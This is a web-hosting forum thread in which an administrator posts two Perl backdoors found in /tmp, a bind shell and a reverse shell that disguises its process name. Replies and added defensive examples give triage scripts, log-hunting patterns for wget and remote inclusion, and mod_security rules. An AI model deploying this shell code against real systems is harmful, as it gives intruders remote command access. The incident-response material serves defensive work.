bandwidth to the roof: suspicious files in tmp
filename: /tmp/bdpl

```perl
#!/usr/bin/perl
# Bind shell: listens on the TCP port given as the first argument and hands
# every incoming connection an interactive bash.
$SHELL="/bin/bash -i";
if (@ARGV < 1) { exit(1); }
$LISTEN_PORT=$ARGV[0];
use Socket;
$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1) {
  accept(CONN,S);
  if(!($pid=fork)) {
    die "Cannot fork" if (!defined $pid);
    # Child: wire stdin/stdout/stderr to the connection and exec the shell
    open STDIN,"<&CONN";
    open STDOUT,">&CONN";
    open STDERR,">&CONN";
    exec $SHELL || die print CONN "Cant execute $SHELL\n";
    close CONN;
    exit 0;
  }
}
```

```
root@server2 [~]# stat /tmp/bdpl
  File: `/tmp/bdpl'
  Size: 612             Blocks: 8          IO Block: 4096   regular file
Device: 700h/1792d      Inode: 1242        Links: 1
Access: (0644/-rw-r--r--)  Uid: (   99/  nobody)   Gid: (   99/  nobody)
Access: 2006-02-07 16:26:35.000000000 -0600
Modify: 2006-02-02 13:26:10.000000000 -0600
Change: 2006-02-02 13:26:10.000000000 -0600
root@server2 [~]# grep bdpl /usr/local/apache/domlogs/*
-bash: /bin/grep: Argument list too long
```

file name: /tmp/back

```perl
#!/usr/bin/perl
# Reverse shell: connects back to the host and port given on the command
# line and ties a /bin/sh to the socket. $0 is overwritten so the process
# shows up in ps as "lynx".
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
```

```
root@server2 [/tmp]# stat /tmp/back
  File: `/tmp/back'
  Size: 541             Blocks: 8          IO Block: 4096   regular file
Device: 700h/1792d      Inode: 415         Links: 1
Access: (0644/-rw-r--r--)  Uid: (   99/  nobody)   Gid: (   99/  nobody)
Access: 2006-02-07 16:30:55.000000000 -0600
Modify: 2006-02-03 12:13:14.000000000 -0600
Change: 2006-02-03 12:13:14.000000000 -0600
root@server2 [/tmp]# grep back /usr/local/apache/domlogs/*
-bash: /bin/grep: Argument list too long
```

Bandwidth spike screenshot attached.

How do I trace this and stop it? I do have iptraf installed also.

Specs: CentOS 4.2, cPanel 10.x, PHP 4.4.2, Apache 1.33, suexec enabled.

Some security measures, to name a few: APF, BFD, LSM, SIM, mod_dosevasive, rkhunter, chkrootkit, secured /tmp.

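An added triage script, not part of the original post, for the two kinds of file shown above. It flags scripts in the given directories that combine the indicators both backdoors share (a socket() call, STDIN/STDOUT/STDERR redirected onto a handle, exec/system of a shell, or a rewritten $0), and then lists processes that run as the web-server uid and hold a socket. The process hunt deliberately does not search for the script path: the `$0="lynx"` trick in /tmp/back rewrites what ps and /proc/<pid>/cmdline show, so uid, exe and open sockets under /proc are the reliable keys. The uid 99 (nobody) and the directory list are assumptions taken from the stat output above; the indicator patterns are mine.

```sh
#!/bin/sh
# Added example: triage world-writable temp dirs for dropped network
# backdoors and find the processes that are running them. Assumes Linux
# /proc and that the web server runs as uid 99 (nobody), as in the thread.

# Print every regular file under the given directories whose content matches
# at least two of the indicator families seen in /tmp/bdpl and /tmp/back.
# Two are required so that a harmless script with a lone socket() is not flagged.
find_backdoor_scripts() {
    find "$@" -xdev -type f -size -64k 2>/dev/null | while IFS= read -r f; do
        hits=0
        grep -qE 'socket\(' "$f" && hits=$((hits + 1))
        # STDIN/STDOUT/STDERR dup'ed onto a handle: open STDIN,"<&CONN" / open(STDOUT, ">&SOCKET")
        grep -qE 'open\(? ?STD(IN|OUT|ERR)[ ,]*"?[<>]&' "$f" && hits=$((hits + 1))
        # exec $SHELL / system($system) / exec "/bin/sh"
        grep -qE '(exec|system)\(? ?\$?(SHELL|system|"/bin/(ba)?sh)' "$f" && hits=$((hits + 1))
        # process-name masquerade: $0 = "lynx"
        grep -qE '^\$0 *=' "$f" && hits=$((hits + 1))
        if [ "$hits" -ge 2 ]; then
            printf '%s\n' "$f"
        fi
    done
    return 0
}

# List processes with the given real uid that hold at least one socket.
# Output: "<pid> <exe> <cmdline>". Run as root so every /proc entry is readable;
# follow up with "netstat -anp" or "lsof -p <pid>" to see the peer address.
find_socket_holders() {
    uid="$1"
    for p in /proc/[0-9]*; do
        pid="${p#/proc/}"
        puid=$(awk '/^Uid:/ {print $2}' "$p/status" 2>/dev/null) || continue
        [ "$puid" = "$uid" ] || continue
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        socks=$(ls -l "$p/fd" 2>/dev/null | grep -c 'socket:') || true
        [ "$socks" -gt 0 ] || continue
        printf '%s %s %s\n' "$pid" "$exe" "$(tr '\0' ' ' < "$p/cmdline" 2>/dev/null)"
    done
    return 0
}

# Usage: sh triage.sh /tmp /var/tmp
if [ "$#" -gt 0 ]; then
    echo "== candidate backdoor scripts =="
    find_backdoor_scripts "$@"
    echo "== uid 99 (nobody) processes holding sockets =="
    find_socket_holders 99
fi
```

Kill what `find_socket_holders` reports before deleting the files, otherwise the running shells survive the cleanup; keep copies of the scripts (with their stat times, which line up with the Modify timestamps above) for the log correlation that follows.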
The file is almost certainly a DoS script that has been dumped into /tmp and/or /var/tmp by a badly coded PHP script. You should kill all the processes, as they are chewing up your bandwidth and making someone else's life hard as well.
If you grep your logs for any wgets or inclusions from some free site providers (geocities.com seems to be a popular choice), you will probably find the user responsible for the script that is being hijacked. The easiest method to avoid this is to implement mod_sec with the default rule set, as this will screen most of the malicious URLs before they can dump these files into your /tmp and /var/tmp.
__________________
www.memset.com Support Team Virtual Dedicated WHM servers from £24.95 per month 400+ cpanel servers and counting

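The log hunt the reply describes, as an added example rather than anything from the thread. cPanel keeps one access log per vhost under /usr/local/apache/domlogs, which is why the plain `grep .../domlogs/*` in the first post blew past ARG_MAX; this uses find and xargs instead, and the per-vhost file name tells you which account's script was abused. The patterns (a parameter whose value is itself a URL, a wget/curl/lynx/fetch call, or a `cd /tmp`) and the three sample log lines are constructed by me; the log directory and the Apache combined format are assumptions.

```sh
#!/bin/sh
# Added example: find the requests that fetched the dropped files and
# attribute them to a vhost and client IP. Assumes cPanel-style per-domain
# logs in Apache combined format; patterns and samples are my own.

# Remote file inclusion (param=http://...), command injection that pulls a
# fetcher, or a chdir into tmp. %20 and + are the URL-encoded spaces.
RFI_PATTERN='[?&][A-Za-z0-9_]+=(https?|ftp)://|(wget|curl|lynx|fetch)(%20|\+| )|cd(%20|\+| )/(var/)?tmp'

# Grep every log under $1 without expanding the file list on the command
# line. Output is "logfile:logline" (grep -H).
hunt_domlogs() {
    logdir="$1"
    find "$logdir" -maxdepth 1 -type f -print0 \
        | xargs -0r grep -HE "$RFI_PATTERN" || true
    return 0
}

# Collapse hunt_domlogs output into "count  vhost  client_ip  request",
# most frequent first. The vhost is the log file's basename.
summarize_hits() {
    awk '{
        i = index($0, ":"); file = substr($0, 1, i - 1); line = substr($0, i + 1)
        sub(/^.*\//, "", file)            # keep only the vhost name
        split(line, f, " "); ip = f[1]    # client address is the first field
        split(line, q, "\"")              # request line sits between the first quotes
        key = file "  " ip "  " q[2]
        c[key]++
    } END { for (k in c) printf "%d  %s\n", c[k], k }' | sort -rn
    return 0
}

# Usage: sh hunt.sh /usr/local/apache/domlogs
if [ "$#" -gt 0 ]; then
    hunt_domlogs "$1" | summarize_hits
fi
```

Correlate the timestamps of the hits with the Modify times from stat on the dropped files (the files keep the mtime of the moment they were written, since nothing in the scripts touches them afterwards); the vhost that shows a matching request a few seconds earlier is the account to suspend and the script to fix.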
If your server doesn't host any PHP applications that use Zend Optimizer, then you can install Hardened-PHP on your server, which can prevent many vulnerabilities in the existing PHP code.
If you are running any version <= 4.3.11, make sure you upgrade to the latest version, 4.4.2, as the older versions are very vulnerable to attacks. Also enable mod_security on the server and add rules that can prevent SQL injection, cross-site scripting and buffer overflow attacks. Also check whether SYN cookies are enabled on the server to guard against DDoS:

```
cat /proc/sys/net/ipv4/tcp_syncookies
```

It should show 1; if not, you can use sysctl to enable it.

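Both replies above point at mod_security; here is a configuration fragment, added as an example and not the default rule set either reply refers to, in the mod_security 1.x (`SecFilter*`) syntax that goes with the Apache 1.3 build in the first post (mod_security 2.x uses `SecRule` instead). The rules cover the remote-inclusion and wget patterns that drop files like the ones shown, plus basic SQL injection and cross-site scripting checks. The file locations and the regexes are my own; the directive names are mod_security 1.9's.

```apache
# mod_security 1.9.x fragment for httpd.conf (Apache 1.3). Added example,
# not the stock rule set. Start with SecFilterDefaultAction "pass,log" and
# read logs/audit_log for a day before switching to deny, or legitimate
# forum/gallery traffic on a busy cPanel box will be blocked.
<IfModule mod_security.c>
    SecFilterEngine On
    SecFilterScanPOST On
    SecFilterCheckURLEncoding On
    SecFilterDefaultAction "deny,log,status:403"
    SecAuditEngine RelevantOnly
    SecAuditLog logs/audit_log

    # Remote file inclusion: a parameter value that is itself a URL
    SecFilterSelective ARGS_VALUES "^(https?|ftp)://"

    # Command injection that pulls a fetcher or moves into tmp, the pattern
    # that left /tmp/bdpl and /tmp/back behind
    SecFilterSelective ARGS "(wget|curl|lynx|fetch)[[:space:]+]"
    SecFilterSelective ARGS "cd[[:space:]+]+/(var/)?tmp"

    # Basic SQL injection and cross-site scripting
    SecFilterSelective ARGS "union[[:space:]+]+select"
    SecFilterSelective ARGS "'[[:space:]]*(or|and)[[:space:]]+"
    SecFilterSelective ARGS "<[[:space:]]*script"
</IfModule>
```

Note that mod_security only sees what arrives over HTTP: it stops the request that drops the next copy of the script, but it does nothing about a backdoor that is already listening, so the process cleanup from the first reply still has to happen.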
Please don't dig up old threads.
__________________
Jonathan Michaelson cPanel Forum Moderator Need your cPanel servers secured and tuned? cPanel Server Configuration, Security, Recovery and Antivirus/AntiSpam Services Developers of the most effective (and free) Firewall & Security Solution for cPanel Servers - csf http://www.configserver.com